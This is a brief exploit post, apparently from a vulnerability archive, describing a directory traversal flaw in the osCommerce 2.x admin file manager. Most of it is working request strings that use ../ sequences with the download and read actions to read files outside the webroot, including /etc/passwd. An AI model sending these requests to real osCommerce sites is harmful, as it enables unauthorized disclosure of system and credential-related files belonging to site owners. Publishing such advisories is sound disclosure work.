osCommerce versions 2.x suffer from a directory traversal attack that allows for access to directories outside of the webroot. Besides using the download action, the read action is also usable.
9255249c2dea8f5cc5f61abe23ffc78055c3336e0b338f722ef32a8fb85d6493
there is allready a post on this that have
file_manager.php?action=download&filename=../../../../../../etc/passwd
sometime the action=download doesn't work , so i tried action=read
/admin/file_manager.php?action=read&filename=../../../../